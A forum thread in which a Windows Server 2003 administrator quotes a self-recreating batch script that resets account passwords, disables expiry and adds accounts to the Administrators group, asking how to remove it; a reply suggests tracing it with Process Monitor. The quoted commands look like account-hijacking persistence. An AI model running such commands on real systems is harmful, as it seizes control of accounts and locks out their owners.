Help
Posted 25 November 2011 - 04:57 AM
we have an 2003 r2 server with sql server ,visual basic ,iis(asp, .net) installed. basically we use for developing in house web application .
problem: an batch program is preventing change administrator and other user password and other properties.code of batch program as follows
------------------------------------------------------------------------------
net user administrator ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup Administrators administrator /add >>c:\log.txt
net user user ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup ariv administrator /add >>c:\log.txt
net user aspnet_iis ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup aspnet_iis administrator /add >>c:\log.txt
net user administrator ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup Administrators administrator /add >>c:\log.txt
net user user ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup ariv administrator /add >>c:\log.txt
net user aspnet_iis ****** /expires:never /passwordchg:yes /active:yes >>c:\log.txt
net localgroup aspnet_iis administrator /add >>c:\log.txt
copy C:\Program Files\user.bat C:\Program Files\user.txt >> log.txt
--------------------------------------------------------------------------
If delete the this batch program it is recreated.If edited and saved then it will show saved but if viewed again its not showing edited matter(show old code as shown above).If renamed it will recreate another batch prgramme with old file name and code
i have doubt that batch program is created by some software developed by in house .if it is so how to trace it and remove it.
please help me to remove this batch file ,
Edit: Moved topic from Introductions to the more appropriate forum. ~ Animal
Page 1 of 1
delete batch programm i cant able to delete or edit batch program in my 2003 server
Back to top
#2
- Member
-
- Group: Members
- Posts: 16
- Joined: 08-May 10
- Gender:Male
- Location:North Carolina, USA
Posted 01 December 2011 - 01:37 PM
There is likely an easier solution than this but the way I would do it is run ProcessMonitor on the server. Filter it to just that directory and delete the file. You should see it log an action of what program is recreating the file. I would guess it is either a service or an exe running in background watching that folder to see if the file gets deleted or altered.
Edit: I am sure you know this but be careful changing passwords on the administrative accounts usually a whole bunch of stuff breaks when you do that on a server
Edit: I am sure you know this but be careful changing passwords on the administrative accounts usually a whole bunch of stuff breaks when you do that on a server
This post has been edited by thefr34k: 01 December 2011 - 01:38 PM
Share this topic:
Page 1 of 1